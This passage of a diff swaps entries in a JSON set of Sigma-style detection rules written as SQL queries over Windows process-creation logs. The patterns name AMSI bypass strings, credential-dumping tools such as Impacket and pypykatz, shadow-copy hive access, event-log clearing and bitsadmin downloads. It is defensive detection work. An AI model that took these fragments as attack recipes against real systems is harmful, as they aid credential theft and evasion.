"attack.privilege_escalation" ], "falsepositives": [ - "Java tools are known to produce false-positive when loading libraries" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'cmd.exe') AND ((ParentCommandLine LIKE '%/c%' ESCAPE '\\' OR ParentCommandLine LIKE '%/k%' ESCAPE '\\' OR ParentCommandLine LIKE '%/r%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/k%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\')) AND (ParentCommandLine = '/../../' OR CommandLine LIKE '%/../../%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%\\\\Tasktop\\\\keycloak\\\\bin\\\\/../../jre\\\\bin\\\\java%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%\\\\Event Viewer\\\\RecentViews%' ESCAPE '\\' OR CommandLine LIKE '%\\\\EventV~1\\\\RecentViews%' ESCAPE '\\') AND CommandLine LIKE '%>%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_path_traversal.yml" + "filename": "proc_creation_win_uac_bypass_eventvwr_recentviews.yml" }, { - "title": "Ping Hex IP", - "id": "1a0d4aba-7668-4365-9ce4-6d79ab088dfd", + "title": "WMI Backdoor Exchange Transport Agent", + "id": "797011dc-44f4-4e6f-9f10-a8ceefbe566b", "status": "test", - "description": "Detects a ping command that uses a hex encoded IP address", + "description": "Detects a WMI backdoor in Exchange Transport Agents via WMI event filters", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1140", - "attack.t1027" + "attack.persistence", + "attack.t1546.003" ], "falsepositives": [ - "Unlikely, because no sane admin pings IP addresses in a hexadecimal form" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ping.exe' ESCAPE '\\' AND CommandLine LIKE '%0x%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\EdgeTransport.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Bin\\\\OleConverter.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_ping_hex_ip.yml" + "filename": "proc_creation_win_wmi_backdoor_exchange_transport_agent.yml" }, { - "title": "Potential ACTINIUM Persistence Activity", - "id": "e1118a8f-82f5-44b3-bb6b-8a284e5df602", + "title": "Invocation of Active Directory Diagnostic Tool (ntdsutil.exe)", + "id": "2afafd61-6aae-4df4-baed-139fa1f4c345", "status": "test", - "description": "Detects specific process parameters as used by ACTINIUM scheduled task persistence creation.", - "author": "Andreas Hunkeler (@Karneades)", + "description": "Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT)", + "author": "Thomas Patzke", "tags": [ - "attack.persistence", - "attack.t1053", - "attack.t1053.005" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ - "Unlikely" + "NTDS maintenance" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%wscript%' ESCAPE '\\' AND CommandLine LIKE '% /e:vbscript%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ntdsutil.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_actinium_persistence.yml" + "filename": "proc_creation_win_ntdsutil_usage.yml" }, { - "title": "Use of Forfiles For Execution", - "id": "9aa5106d-bce3-4b13-86df-3a20f1d5cf0b", - "status": "experimental", - "description": "Execute commands and binaries from the context of \"forfiles\". This is used as a LOLBIN for example to bypass application whitelisting.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Process Created Via Wmic.EXE", + "id": "3c89a1e8-0fba-449e-8f1b-8409d6267ec8", + "status": "test", + "description": "Detects WMIC executing \"process call create\" with suspicious calls to processes such as \"rundll32\", \"regsrv32\", etc.", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059" + "attack.t1047" ], "falsepositives": [ - "Legitimate use via a batch script or by an administrator." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR OriginalFileName = 'forfiles.exe') AND (CommandLine LIKE '% /p %' ESCAPE '\\' OR CommandLine LIKE '% -p %' ESCAPE '\\') AND (CommandLine LIKE '% /m %' ESCAPE '\\' OR CommandLine LIKE '% -m %' ESCAPE '\\') AND (CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%call %' ESCAPE '\\' AND CommandLine LIKE '%create %' ESCAPE '\\' AND (CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_forfiles.yml" + "filename": "proc_creation_win_wmic_susp_process_creation.yml" }, { - "title": "Suspicious Eventlog Clear or Configuration Change", - "id": "cc36992a-4671-4f21-a91d-6c2b72a2edf5", - "status": "stable", - "description": "Detects clearing or configuration of eventlogs using wevtutil, powershell and wmic. Might be used by ransomwares during the attack (seen by NotPetya and others).", - "author": "Ecco, Daniil Yugoslavskiy, oscd.community, D3F7A5105", + "title": "DarkSide Ransomware Pattern", + "id": "965fff6c-1d7e-4e25-91fd-cdccd75f7d2c", + "status": "test", + "description": "Detects DarkSide Ransomware and helpers", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "attack.t1562.002", - "car.2016-04-002" + "attack.execution", + "attack.t1204" ], "falsepositives": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment", - "Maintenance activity" + "Unknown", + "UAC bypass method used by other malware" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' AND (CommandLine LIKE '%clear-log %' ESCAPE '\\' OR CommandLine LIKE '% cl %' ESCAPE '\\' OR CommandLine LIKE '%set-log %' ESCAPE '\\' OR CommandLine LIKE '% sl %' ESCAPE '\\' OR CommandLine LIKE '%lfn:%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%Clear-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Remove-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Limit-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Clear-WinEvent %' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '% ClearEventLog %' ESCAPE '\\')) AND NOT (((ParentProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND CommandLine LIKE '% sl %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%=[char][byte](''0x''+%' ESCAPE '\\' OR CommandLine LIKE '% -work worker0 -path %' ESCAPE '\\') OR (ParentCommandLine LIKE '%DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_eventlog_clear.yml" + "filename": "proc_creation_win_malware_darkside_ransomware.yml" }, { - "title": "Potential AMSI Bypass Via .NET Reflection", - "id": "30edb182-aa75-42c0-b0a9-e998bb29067c", + "title": "Abusing Print Executable", + "id": "bafac3d6-7de9-4dd9-8874-4a1194b493ed", "status": "test", - "description": "Detects Request to \"amsiInitFailed\" that can be used to disable AMSI Scanning", - "author": "Markus Neis, @Kostastsale", + "description": "Attackers can use print.exe for remote file copy", + "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%System.Management.Automation.AmsiUtils%' ESCAPE '\\' OR CommandLine LIKE '%amsiInitFailed%' ESCAPE '\\') OR (CommandLine LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND CommandLine LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND CommandLine LIKE '%NonPublic,Static%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\print.exe' ESCAPE '\\' AND CommandLine LIKE 'print%' ESCAPE '\\' AND CommandLine LIKE '%/D%' ESCAPE '\\' AND CommandLine LIKE '%.exe%' ESCAPE '\\') AND NOT (CommandLine LIKE '%print.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_amsi_init_failed_bypass.yml" + "filename": "proc_creation_win_print_remote_file_copy.yml" }, { - "title": "Fsutil Behavior Set SymlinkEvaluation", - "id": "c0b2768a-dd06-4671-8339-b16ca8d1f27f", + "title": "Python Inline Command Execution", + "id": "899133d5-4d7c-4a7f-94ee-27355c879d90", "status": "experimental", - "description": "A symbolic link is a type of file that contains a reference to another file.\nThis is probably done to make sure that the ransomware is able to follow shortcuts on the machine in order to find the original file to encrypt\n", - "author": "frack113", + "description": "Detects execution of python using the \"-c\" flag. This is could be used as a way to launch a reverse shell or execute live python code.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", "attack.t1059" ], "falsepositives": [ - "Legitimate use" + "Python libraries that use a flag starting with \"-c\". Filter according to your environment" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR OriginalFileName = 'fsutil.exe') AND (CommandLine LIKE '%behavior %' ESCAPE '\\' AND CommandLine LIKE '%set %' ESCAPE '\\' AND CommandLine LIKE '%SymlinkEvaluation%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((OriginalFileName = 'python.exe' OR (NewProcessName LIKE '%python.exe' ESCAPE '\\' OR NewProcessName LIKE '%python3.exe' ESCAPE '\\' OR NewProcessName LIKE '%python2.exe' ESCAPE '\\')) AND CommandLine LIKE '% -c%' ESCAPE '\\') AND NOT ((ParentProcessName LIKE 'C:\\\\Program Files\\\\Python%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\python.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-E -s -m ensurepip -U --default-pip%' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_fsutil_symlinkevaluation.yml" + "filename": "proc_creation_win_python_inline_command_execution.yml" }, { - "title": "HackTool - Impacket Tools Execution", - "id": "4627c6ae-6899-46e2-aa0c-6ebcb1becd19", - "status": "test", - "description": "Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)", - "author": "Florian Roth (Nextron Systems)", + "title": "PUA - Crassus Execution", + "id": "2c32b543-1058-4808-91c6-5b31b8bed6c5", + "status": "experimental", + "description": "Detects Crassus a windows privilege escalation discovery tool based on PE metadata characteristics.", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1557.001" + "attack.discovery", + "attack.t1590.001" ], "falsepositives": [ - "Legitimate use of the impacket tools" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\goldenPac%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\karmaSMB%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\kintercept%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntlmrelayx%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rpcdump%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\samrdump%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\secretsdump%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbexec%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbrelayx%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmiexec%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmipersist%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\atexec\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dcomexec\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dpapi\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\findDelegation\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\GetADUsers\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\GetNPUsers\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\getPac\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\getST\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\getTGT\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\GetUserSPNs\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ifmap\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mimikatz\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netview\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nmapAnswerMachine\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opdump\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psexec\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rdp\\_check\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sambaPipe\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbclient\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbserver\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sniffer\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sniff\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\split\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ticketer\\_windows.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Crassus.exe' ESCAPE '\\' OR OriginalFileName = 'Crassus.exe' OR Description LIKE '%Crassus%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_impacket_tools.yml" + "filename": "proc_creation_win_pua_crassus.yml" }, { - "title": "Suspicious Extexport Execution", - "id": "fb0b815b-f5f6-4f50-970f-ffe21f253f7a", + "title": "Sensitive Registry Access via Volume Shadow Copy", + "id": "f57f8d16-1f39-4dcb-a604-6c73d9b54b3d", "status": "experimental", - "description": "Extexport.exe loads dll and is execute from other folder the original path", - "author": "frack113", - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "falsepositives": [ - "Unknown" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%Extexport.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Extexport.exe' ESCAPE '\\' OR OriginalFileName = 'extexport.exe'))" - ], - "filename": "proc_creation_win_lolbin_extexport.yml" - }, - { - "title": "Interactive AT Job", - "id": "60fc936d-2eb0-4543-8a13-911c750a1dfc", - "status": "test", - "description": "Detects an interactive AT job, which may be used as a form of privilege escalation.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "description": "Detects a command that accesses password storing registry hives via volume shadow backups", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1053.002" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Unlikely (at.exe deprecated as of Windows 8)" + "Some rare backup scenarios" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\at.exe' ESCAPE '\\' AND CommandLine LIKE '%interactive%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\NTDS.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SECURITY%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\tmp\\\\log%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_at_interactive_execution.yml" + "filename": "proc_creation_win_malware_conti_shadowcopy.yml" }, { - "title": "HackTool - Pypykatz Credentials Dumping Activity", - "id": "a29808fd-ef50-49ff-9c7a-59a9b040b404", - "status": "test", - "description": "Detects the usage of \"pypykatz\" to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored", - "author": "frack113", + "title": "Rundll32 With Suspicious Parent Process", + "id": "1723e720-616d-4ddc-ab02-f7e3685a4713", + "status": "experimental", + "description": "Detects suspicious start of rundll32.exe with a parent process of Explorer.exe. Variant of Raspberry Robin, as first reported by Red Canary.", + "author": "CD_ROM_", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\pypykatz.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\python.exe' ESCAPE '\\') AND CommandLine LIKE '%live%' ESCAPE '\\' AND CommandLine LIKE '%registry%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ParentProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '% C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '% -localserver 22d8c27b-47a1-48d1-ad08-7da7abd79617' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_pypykatz.yml" + "filename": "proc_creation_win_rundll32_parent_explorer.yml" }, { - "title": "Root Certificate Installed From Susp Locations", - "id": "5f6a601c-2ecb-498b-9c33-660362323afa", + "title": "Potential CVE-2022-29072 Exploitation Attempt", + "id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ee3", "status": "experimental", - "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability.\n7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow.\nThe command runs in a child process under the 7zFM.exe process.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1553.004" + "attack.execution", + "cve.2022.29072" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Import-Certificate%' ESCAPE '\\' AND CommandLine LIKE '% -FilePath %' ESCAPE '\\' AND CommandLine LIKE '%Cert:\\\\LocalMachine\\\\Root%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND ParentProcessName LIKE '%\\\\7zFM.exe' ESCAPE '\\') AND NOT (((CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% /k %' ESCAPE '\\' OR CommandLine LIKE '% /r %' ESCAPE '\\')) OR (CommandLine = '')))" ], - "filename": "proc_creation_win_powershell_import_cert_susp_locations.yml" + "filename": "proc_creation_win_exploit_cve_2022_29072_7zip.yml" }, { - "title": "Suspicious WERMGR Process Patterns", - "id": "396f6630-f3ac-44e3-bfc8-1b161bc00c4e", + "title": "PUA - AdvancedRun Suspicious Execution", + "id": "fa00b701-44c6-4679-994d-5a18afa8a707", "status": "experimental", - "description": "Detects suspicious Windows Error Reporting manager (wermgr.exe) process patterns - suspicious parents / children, execution folders, command lines etc.", + "description": "Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts", "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%/EXEFilename%' ESCAPE '\\' OR CommandLine LIKE '%/CommandLine%' ESCAPE '\\') AND ((CommandLine LIKE '% /RunAs 8 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 4 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 10 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 11 %' ESCAPE '\\') OR (CommandLine LIKE '%/RunAs 8' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 4' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 10' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 11' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wermgr_susp_child_process.yml" + "filename": "proc_creation_win_pua_advancedrun_priv_user.yml" }, { - "title": "Suspicious RunAs-Like Flag Combination", - "id": "50d66fb0-03f8-4da0-8add-84e77d12a020", + "title": "File Download Via Bitsadmin To An Uncommon Target Folder", + "id": "6e30c82f-a9f8-4aab-b79c-7c12bce6f248", "status": "experimental", - "description": "Detects suspicious command line flags that let the user set a target user and command as e.g. seen in PsExec-like tools", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of bitsadmin downloading a file to uncommon target folder", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -u system %' ESCAPE '\\' OR CommandLine LIKE '% --user system %' ESCAPE '\\' OR CommandLine LIKE '% -u NT%' ESCAPE '\\' OR CommandLine LIKE '% -u \"NT%' ESCAPE '\\' OR CommandLine LIKE '% -u ''NT%' ESCAPE '\\' OR CommandLine LIKE '% --system %' ESCAPE '\\' OR CommandLine LIKE '% -u administrator %' ESCAPE '\\') AND (CommandLine LIKE '% -c cmd%' ESCAPE '\\' OR CommandLine LIKE '% -c \"cmd%' ESCAPE '\\' OR CommandLine LIKE '% -c powershell%' ESCAPE '\\' OR CommandLine LIKE '% -c \"powershell%' ESCAPE '\\' OR CommandLine LIKE '% --command cmd%' ESCAPE '\\' OR CommandLine LIKE '% --command powershell%' ESCAPE '\\' OR CommandLine LIKE '% -c whoami%' ESCAPE '\\' OR CommandLine LIKE '% -c wscript%' ESCAPE '\\' OR CommandLine LIKE '% -c cscript%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_privilege_escalation_cli_patterns.yml" + "filename": "proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml" }, { - "title": "Potential Product Class Reconnaissance Via Wmic.EXE", - "id": "e568650b-5dcd-4658-8f34-ded0b1e13992", - "status": "experimental", - "description": "Detects the execution of WMIC in order to get a list of firewall and antivirus products", - "author": "Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community", + "title": "TAIDOOR RAT DLL Load", + "id": "d1aa3382-abab-446f-96ea-4de52908210b", + "status": "test", + "description": "Detects specific process characteristics of Chinese TAIDOOR RAT malware load", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1047", - "car.2016-03-002" + "attack.t1055.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%AntiVirusProduct%' ESCAPE '\\' OR CommandLine LIKE '%FirewallProduct%' ESCAPE '\\'))" + "SELECT * 